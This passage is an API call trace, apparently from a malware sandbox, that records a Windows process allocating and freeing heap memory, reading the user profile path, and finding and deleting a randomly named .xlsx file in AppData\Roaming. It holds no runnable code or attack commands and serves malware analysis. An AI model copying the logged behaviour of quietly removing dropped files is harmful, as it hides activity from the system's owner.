hHeap=0x970000) returned 1 [0242.426] CloseHandle (hObject=0x2a0) returned 1 [0242.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0242.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0242.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0242.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0242.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.430] CloseHandle (hObject=0x2d0) returned 1 [0242.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0242.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0242.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0242.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0242.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0242.441] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.441] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0242.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e564e0 [0242.443] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZTd7YZt.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx", lpFilePart=0x8cedf4*="ZTd7YZt.xlsx") returned 0x2c [0242.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0242.443] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ztd7yzt.xlsx")) returned 0x20 [0242.485] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe917aad0, ftCreationTime.dwHighDateTime=0x1d5ef67, ftLastAccessTime.dwLowDateTime=0xf6bc5750, ftLastAccessTime.dwHighDateTime=0x1d5ecbd, ftLastWriteTime.dwLowDateTime=0xf6bc5750, ftLastWriteTime.dwHighDateTime=0x1d5ecbd, nFileSizeHigh=0x0, nFileSizeLow=0xc394, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ZTd7YZt.xlsx", cAlternateFileName="ZTD7YZ~1.XLS")) returned 0xa870d0 [0242.485] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ztd7yzt.xlsx")) returned 1 [0242.538] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe917aad0, ftCreationTime.dwHighDateTime=0x1d5ef67, ftLastAccessTime.dwLowDateTime=0xf6bc5750, ftLastAccessTime.dwHighDateTime=0x1d5ecbd, ftLastWriteTime.dwLowDateTime=0xf6bc5750, ftLastWriteTime.dwHighDateTime=0x1d5ecbd, nFileSizeHigh=0x0, nFileSizeLow=0xc394, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ZTd7YZt.xlsx", cAlternateFileName="ZTD7YZ~1.XLS")) returned 0 [0242.538] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0242.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0242.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0242.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0242.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0242.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0242.539] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0242.539] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e564e0 [0242.539] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZTd7YZt.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx", lpFilePart=0x8cf650*="ZTd7YZt.xlsx") returned 0x2c [0242.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0242.539] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZTd7YZt.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ztd7yzt.xlsx")) returned 0xffffffff [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0242.540] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0242.540] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0242.540] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0242.540] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0242.540] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0242.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0242.540] 